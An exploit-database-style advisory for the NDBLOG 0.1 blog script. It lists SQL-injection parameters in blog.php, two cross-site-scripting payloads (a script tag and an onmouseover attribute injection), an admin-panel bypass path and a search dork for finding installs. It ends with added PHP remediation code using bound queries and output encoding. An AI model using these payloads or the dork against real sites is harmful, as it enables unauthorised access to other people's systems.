NDBLOG version 0.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
NDBLOG version 0.1 Multiple Vulnerabilities
===========================================
Author : indoushka
Vendor : ALAMARAB2.com
Dork : جميع الحقوق محفوظة © - ALAMARAB2.com - NDBLOG v_0.1
==================================================
SQL injection :
http://localhost/ND/blog.php?id=85 (inject here)
Blind SQL Injection :
http://localhost/ND/blog.php?action=delete&id=11 (inject here)
Panel = localhost/ND/admin/
Login = http://localhost/ND/login.php
Cross site scripting (verified) :
URL encoded POST input user was set to 1'"()&%<ScRiPt >prompt(999862)</ScRiPt>
Cross site scripting [stored] (verified) :
URL encoded POST input img was set to 1" onmouseover=prompt(976473) bad="
The input is reflected in http://localhost/ND/
The input is reflected inside a tag parameter between double quotes.
Bypass :
http://localhost/ND/admin/menu.php
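
Remediation sketch for the id parameter of blog.php and for the img value reflected inside a double-quoted attribute. This is an added example, not NDBLOG source code: the table and column names (posts, id, title, img), the helper function names and the in-memory SQLite database are assumptions made so that it runs stand-alone.

```php
<?php
// Added example, not NDBLOG code. Schema and function names are hypothetical.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, img TEXT)');

// Constructed row: img holds the stored value quoted in the advisory.
$ins = $db->prepare('INSERT INTO posts (id, title, img) VALUES (?, ?, ?)');
$ins->execute([85, 'demo', '1" onmouseover=prompt(976473) bad="']);

/** Fetch one post. The id is validated as an integer and bound, never concatenated. */
function fetch_post(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a positive integer stops here
    }
    $stmt = $db->prepare('SELECT id, title, img FROM posts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Encode a value for element text or a quoted HTML attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render a post; every stored value passes through h() before output. */
function render_post(array $post): string
{
    return '<h2>' . h($post['title']) . '</h2>'
         . '<img src="' . h($post['img']) . '" alt="">';
}

// A non-integer id is rejected before any SQL runs.
var_dump(fetch_post($db, '85 OR 1=1'));

// The stored double quotes come out as &quot;, so the value stays inside src="...".
echo render_post(fetch_post($db, '85')), "\n";
```

The same binding applies to the action=delete request, which should additionally be reachable only from an authenticated session, as should admin/menu.php.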